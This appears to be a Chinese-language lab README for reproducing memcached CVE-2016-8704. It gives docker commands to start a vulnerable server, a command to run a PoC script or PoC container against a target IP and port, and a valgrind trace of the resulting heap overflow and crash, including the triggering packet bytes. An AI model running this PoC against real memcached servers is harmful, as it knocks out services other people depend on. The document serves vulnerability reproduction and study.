感谢 @xing-xiao 提供原始环境。 #6
- 拉取镜像到本地
$ docker pull medicean/vulapps:m_memcached_CVE-2016-8704
- 启动环境
$ docker run -d -p 11211:11211 medicean/vulapps:m_memcached_CVE-2016-8704
如果需要追溯堆栈,需在启动时 valgrind 调试 memcached,则启动环境命令如下:
$ docker run -i -t -u root -p 11211:11211 medicean/vulapps:m_memcached_CVE-2016-8704 /valgrind.sh
也可执行 /bin/bash,随后手动使用 valgrind 调试
- 拉取镜像到本地
$ docker pull registry.cn-hangzhou.aliyuncs.com/lo0o/memcached:1.4.32
- 启动环境
$ docker run -d -p 11211:11211 registry.cn-hangzhou.aliyuncs.com/lo0o/memcached:1.4.32
-
获取目标 IP 地址与端口号,如:192.168.100.2 端口号为 11211
-
执行 poc.py
$ python poc.py 192.168.100.2 11211
- 如果服务端服务崩溃则代表执行成功
如果使用 valgrind 调试启动的环境,则会看到类似如下信息:
36: going from conn_closing to conn_closed
<37 new auto-negotiating client connection
37: going from conn_new_cmd to conn_waiting
37: going from conn_waiting to conn_read
37: going from conn_read to conn_parse_cmd
37: Client using the binary protocol
<37 Read binary protocol data:
<37 0x80 0x1a 0x00 0xfa
<37 0x00 0x00 0x00 0x00
<37 0x00 0x00 0x00 0x00
<37 0x00 0x00 0x00 0x00
<37 0x00 0x00 0x00 0x00
<37 0x00 0x00 0x00 0x00
37: going from conn_parse_cmd to conn_nread
Value len is -250
==8== Thread 4:
==8== Invalid write of size 8
==8== at 0x4C326CB: memcpy@@GLIBC_2.14 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==8== by 0x4132C8: memcpy (string3.h:53)
==8== by 0x4132C8: do_item_alloc (items.c:238)
==8== by 0x40A884: process_bin_append_prepend (memcached.c:2302)
==8== by 0x40A884: complete_nread_binary (memcached.c:2425)
==8== by 0x40A884: complete_nread (memcached.c:2484)
==8== by 0x40D367: drive_machine (memcached.c:4656)
==8== by 0x4E47A0B: event_base_loop (in /usr/lib/x86_64-linux-gnu/libevent-2.0.so.5.1.9)
==8== by 0x414874: worker_libevent (thread.c:380)
==8== by 0x52A26B9: start_thread (pthread_create.c:333)
==8== Address 0x5d1ae90 is 0 bytes after a block of size 1,048,512 alloc'd
==8== at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==8== by 0x40F9DF: memory_allocate (slabs.c:538)
==8== by 0x40F9DF: do_slabs_newslab (slabs.c:233)
==8== by 0x40FA6E: do_slabs_alloc (slabs.c:328)
==8== by 0x41007E: slabs_alloc (slabs.c:584)
==8== by 0x4131E6: do_item_alloc (items.c:180)
==8== by 0x407741: process_update_command (memcached.c:3403)
==8== by 0x40B2FF: process_command (memcached.c:3836)
==8== by 0x40CE0B: try_read_command (memcached.c:4205)
==8== by 0x40CE0B: drive_machine (memcached.c:4618)
==8== by 0x4E47A0B: event_base_loop (in /usr/lib/x86_64-linux-gnu/libevent-2.0.so.5.1.9)
==8== by 0x414874: worker_libevent (thread.c:380)
==8== by 0x52A26B9: start_thread (pthread_create.c:333)
==8==
如无 Python 可使用 Docker PoC :
$ docker run registry.cn-hangzhou.aliyuncs.com/lo0o-rush/memcached:cve-2016-8704 {ip地址} {端口号}
暂无命令执行 Exp,如果你愿意分享该 Exp 可向本仓库发起 Pull Request